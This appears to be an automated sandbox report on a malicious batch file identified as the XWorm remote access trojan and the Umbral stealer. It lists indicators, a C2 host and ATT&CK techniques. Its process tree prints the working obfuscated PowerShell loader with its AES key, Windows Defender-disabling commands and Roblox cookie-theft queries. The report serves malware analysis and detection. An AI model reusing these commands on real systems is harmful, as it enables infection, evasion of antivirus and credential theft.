umbral | 48b14d5f105efa0097cc24de8bbf0c334da58906addc06a9a42fe8274d8759e2

Resubmissions

01-12-2024 17:49

241201-wd91zaskbr 10

01-12-2024 17:46

241201-wcqkyaxmaw 10

01-12-2024 17:37

241201-v7ftjsxlcv 10

Analysis

max time kernel
44s
max time network
59s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
01-12-2024 17:37

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

fixer.bat
Size

259KB
MD5

63f3ebe3fe598479517c1843d1f05944
SHA1

4aaeed78293c47805595957cc3fa71d5fdd07d15
SHA256

48b14d5f105efa0097cc24de8bbf0c334da58906addc06a9a42fe8274d8759e2
SHA512

12d5f9c569812a7cef6838c64414757689ee811aecfbc21465b36c0bcecb755b8d75a5f5663bbc5e7d102532ed64cc788b370a00464869044e8576699d0b1e7b
SSDEEP

6144:SIujxg7ViKrBi4Jya9IlvpPxmbkdtEGQQ9ZGeRFBc81tx4Z:m8VTrBiuEpYI3EQzJRFB5GZ

Score

10^/10

umbral xworm discovery execution rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

cheflilou-43810.portmap.host:43810

Mutex

q2m91QtHDnjEQolK

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001900000002ab3f-25.dat	family_umbral
behavioral1/memory/1952-32-0x000002142F2F0000-0x000002142F330000-memory.dmp	family_umbral

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/912-15-0x000001A6EA6F0000-0x000001A6EA6FE000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	912	powershell.exe
6	912	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2212	powershell.exe
3076	powershell.exe
5116	powershell.exe
1708	powershell.exe
912	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	kgwwls.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JHost5050.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JHost5050.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1952	kgwwls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	discord.com
8	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3736	cmd.exe
4584	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2364	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4584	PING.EXE

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
912	powershell.exe
912	powershell.exe
1952	kgwwls.exe
2212	powershell.exe
2212	powershell.exe
3076	powershell.exe
3076	powershell.exe
5116	powershell.exe
5116	powershell.exe
1616	powershell.exe
1616	powershell.exe
1708	powershell.exe
1708	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	912	powershell.exe
Token: SeDebugPrivilege	912	powershell.exe
Token: SeDebugPrivilege	1952	kgwwls.exe
Token: SeIncreaseQuotaPrivilege	3760	wmic.exe
Token: SeSecurityPrivilege	3760	wmic.exe
Token: SeTakeOwnershipPrivilege	3760	wmic.exe
Token: SeLoadDriverPrivilege	3760	wmic.exe
Token: SeSystemProfilePrivilege	3760	wmic.exe
Token: SeSystemtimePrivilege	3760	wmic.exe
Token: SeProfSingleProcessPrivilege	3760	wmic.exe
Token: SeIncBasePriorityPrivilege	3760	wmic.exe
Token: SeCreatePagefilePrivilege	3760	wmic.exe
Token: SeBackupPrivilege	3760	wmic.exe
Token: SeRestorePrivilege	3760	wmic.exe
Token: SeShutdownPrivilege	3760	wmic.exe
Token: SeDebugPrivilege	3760	wmic.exe
Token: SeSystemEnvironmentPrivilege	3760	wmic.exe
Token: SeRemoteShutdownPrivilege	3760	wmic.exe
Token: SeUndockPrivilege	3760	wmic.exe
Token: SeManageVolumePrivilege	3760	wmic.exe
Token: 33	3760	wmic.exe
Token: 34	3760	wmic.exe
Token: 35	3760	wmic.exe
Token: 36	3760	wmic.exe
Token: SeIncreaseQuotaPrivilege	3760	wmic.exe
Token: SeSecurityPrivilege	3760	wmic.exe
Token: SeTakeOwnershipPrivilege	3760	wmic.exe
Token: SeLoadDriverPrivilege	3760	wmic.exe
Token: SeSystemProfilePrivilege	3760	wmic.exe
Token: SeSystemtimePrivilege	3760	wmic.exe
Token: SeProfSingleProcessPrivilege	3760	wmic.exe
Token: SeIncBasePriorityPrivilege	3760	wmic.exe
Token: SeCreatePagefilePrivilege	3760	wmic.exe
Token: SeBackupPrivilege	3760	wmic.exe
Token: SeRestorePrivilege	3760	wmic.exe
Token: SeShutdownPrivilege	3760	wmic.exe
Token: SeDebugPrivilege	3760	wmic.exe
Token: SeSystemEnvironmentPrivilege	3760	wmic.exe
Token: SeRemoteShutdownPrivilege	3760	wmic.exe
Token: SeUndockPrivilege	3760	wmic.exe
Token: SeManageVolumePrivilege	3760	wmic.exe
Token: 33	3760	wmic.exe
Token: 34	3760	wmic.exe
Token: 35	3760	wmic.exe
Token: 36	3760	wmic.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	3076	powershell.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeIncreaseQuotaPrivilege	2400	wmic.exe
Token: SeSecurityPrivilege	2400	wmic.exe
Token: SeTakeOwnershipPrivilege	2400	wmic.exe
Token: SeLoadDriverPrivilege	2400	wmic.exe
Token: SeSystemProfilePrivilege	2400	wmic.exe
Token: SeSystemtimePrivilege	2400	wmic.exe
Token: SeProfSingleProcessPrivilege	2400	wmic.exe
Token: SeIncBasePriorityPrivilege	2400	wmic.exe
Token: SeCreatePagefilePrivilege	2400	wmic.exe
Token: SeBackupPrivilege	2400	wmic.exe
Token: SeRestorePrivilege	2400	wmic.exe
Token: SeShutdownPrivilege	2400	wmic.exe
Token: SeDebugPrivilege	2400	wmic.exe
Token: SeSystemEnvironmentPrivilege	2400	wmic.exe
Token: SeRemoteShutdownPrivilege	2400	wmic.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 3412 wrote to memory of 912	3412	cmd.exe	79
PID 3412 wrote to memory of 912	3412	cmd.exe	79
PID 912 wrote to memory of 1952	912	powershell.exe	81
PID 912 wrote to memory of 1952	912	powershell.exe	81
PID 1952 wrote to memory of 3760	1952	kgwwls.exe	82
PID 1952 wrote to memory of 3760	1952	kgwwls.exe	82
PID 1952 wrote to memory of 4340	1952	kgwwls.exe	84
PID 1952 wrote to memory of 4340	1952	kgwwls.exe	84
PID 1952 wrote to memory of 2212	1952	kgwwls.exe	86
PID 1952 wrote to memory of 2212	1952	kgwwls.exe	86
PID 1952 wrote to memory of 3076	1952	kgwwls.exe	88
PID 1952 wrote to memory of 3076	1952	kgwwls.exe	88
PID 1952 wrote to memory of 5116	1952	kgwwls.exe	90
PID 1952 wrote to memory of 5116	1952	kgwwls.exe	90
PID 1952 wrote to memory of 1616	1952	kgwwls.exe	92
PID 1952 wrote to memory of 1616	1952	kgwwls.exe	92
PID 1952 wrote to memory of 2400	1952	kgwwls.exe	94
PID 1952 wrote to memory of 2400	1952	kgwwls.exe	94
PID 1952 wrote to memory of 4216	1952	kgwwls.exe	96
PID 1952 wrote to memory of 4216	1952	kgwwls.exe	96
PID 1952 wrote to memory of 2796	1952	kgwwls.exe	98
PID 1952 wrote to memory of 2796	1952	kgwwls.exe	98
PID 1952 wrote to memory of 1708	1952	kgwwls.exe	100
PID 1952 wrote to memory of 1708	1952	kgwwls.exe	100
PID 1952 wrote to memory of 2364	1952	kgwwls.exe	102
PID 1952 wrote to memory of 2364	1952	kgwwls.exe	102
PID 1952 wrote to memory of 3736	1952	kgwwls.exe	104
PID 1952 wrote to memory of 3736	1952	kgwwls.exe	104
PID 3736 wrote to memory of 4584	3736	cmd.exe	106
PID 3736 wrote to memory of 4584	3736	cmd.exe	106

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4340	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLcV5Di0lrYzeB8Z5oXuvc+IYrKKIGk30pV1obfMeT4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8hV4bFs+GCRTAu0FDqlpAg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JhDGU=New-Object System.IO.MemoryStream(,$param_var); $kMVbR=New-Object System.IO.MemoryStream; $mBSnP=New-Object System.IO.Compression.GZipStream($JhDGU, [IO.Compression.CompressionMode]::Decompress); $mBSnP.CopyTo($kMVbR); $mBSnP.Dispose(); $JhDGU.Dispose(); $kMVbR.Dispose(); $kMVbR.ToArray();}function execute_function($param_var,$param2_var){ $fmLYa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hvYPj=$fmLYa.EntryPoint; $hvYPj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';$TAymA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\fixer.bat').Split([Environment]::NewLine);foreach ($kvbgu in $TAymA) { if ($kvbgu.StartsWith(':: ')) { $IkiFk=$kvbgu.Substring(3); break; }}$payloads_var=[string[]]$IkiFk.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:912
- - C:\Users\Admin\AppData\Local\Temp\kgwwls.exe
    "C:\Users\Admin\AppData\Local\Temp\kgwwls.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1952
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3760
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\kgwwls.exe"
      4⤵
      Views/modifies file attributes
      PID:4340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\kgwwls.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2212
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5116
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1616
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2400
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:4216
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:2796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1708
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2364
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\kgwwls.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:3736
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
10254f48b63b60ae6245903153592e48

SHA1
2c300d1c60c50e8896705022bc402c423681f40a

SHA256
b3778ffb5260878714023fd1abc70c4e850b5397c2b32a3975b1ff28bfd96c69

SHA512
6a7e7844c47a07bc8fd0b59267f0d1bac460f672ada93131edd65ca2eb33159de9f6291a1acde745f32991b364e9ceac697f2dfcf1a2696b51a9120dd7af77d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
05b3cd21c1ec02f04caba773186ee8d0

SHA1
39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

SHA256
911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

SHA512
e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
ed6f17e13c0654979a4c7673c20ca8ec

SHA1
0295ab73ec0b415f93206f44e8fef38b1d05059a

SHA256
66a90f7beaaa14c629fbd53754873b19ed99db9469566c43d0ca810ca48662f1

SHA512
1eb7e9be650cf837d74546f24d62263df4b89c985bd208ed52870afd7726f08c9e7412bb5a2dfae2cae01aeec156a2c28d4dc1398b84a5c7fc4035cb84c697d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ac871344dc49ae49f13f0f88acb4868

SHA1
5a073862375c7e79255bb0eab32c635b57a77f98

SHA256
688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

SHA512
ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v0x5gqff.24i.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kgwwls.exe

Filesize
227KB

MD5
d2d3a70b2bb57de2e98a24e8dac7a79c

SHA1
1d527ece8a8a52948928a8b1c15bbe329c16f4db

SHA256
7c686dffa28318119a8c0a5fbd17fb828894470f8b61f3d3339393c3f634391a

SHA512
de561197eb37385c46a461c04066c45c1b8be2136c16524e04085a8bdf46b1073b20bd86de45cee296619c166cd1acee7921ffe60fa7c9bdd95d9a7a95787687

Download Submit
memory/912-15-0x000001A6EA6F0000-0x000001A6EA6FE000-memory.dmp

Filesize
56KB

Download
memory/912-14-0x000001A6EA6A0000-0x000001A6EA6D2000-memory.dmp

Filesize
200KB

Download
memory/912-19-0x00007FF8EB653000-0x00007FF8EB655000-memory.dmp

Filesize
8KB

Download
memory/912-20-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

Filesize
10.8MB

Download
memory/912-13-0x000001A6D2440000-0x000001A6D2448000-memory.dmp

Filesize
32KB

Download
memory/912-0-0x00007FF8EB653000-0x00007FF8EB655000-memory.dmp

Filesize
8KB

Download
memory/912-12-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

Filesize
10.8MB

Download
memory/912-34-0x000001A6EAB40000-0x000001A6EAB4E000-memory.dmp

Filesize
56KB

Download
memory/912-11-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

Filesize
10.8MB

Download
memory/912-10-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

Filesize
10.8MB

Download
memory/912-9-0x000001A6EA520000-0x000001A6EA542000-memory.dmp

Filesize
136KB

Download
memory/1952-32-0x000002142F2F0000-0x000002142F330000-memory.dmp

Filesize
256KB

Download
memory/1952-60-0x0000021449A50000-0x0000021449A6E000-memory.dmp

Filesize
120KB

Download
memory/1952-59-0x0000021449B50000-0x0000021449BA0000-memory.dmp

Filesize
320KB

Download
memory/1952-58-0x0000021449AD0000-0x0000021449B46000-memory.dmp

Filesize
472KB

Download
memory/1952-95-0x0000021449A80000-0x0000021449A8A000-memory.dmp

Filesize
40KB

Download
memory/1952-96-0x0000021449AB0000-0x0000021449AC2000-memory.dmp

Filesize
72KB

Download
memory/1952-33-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

Filesize
10.8MB

Download
memory/1952-111-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

Filesize
10.8MB

Download
memory/1952-116-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

Filesize
10.8MB

Download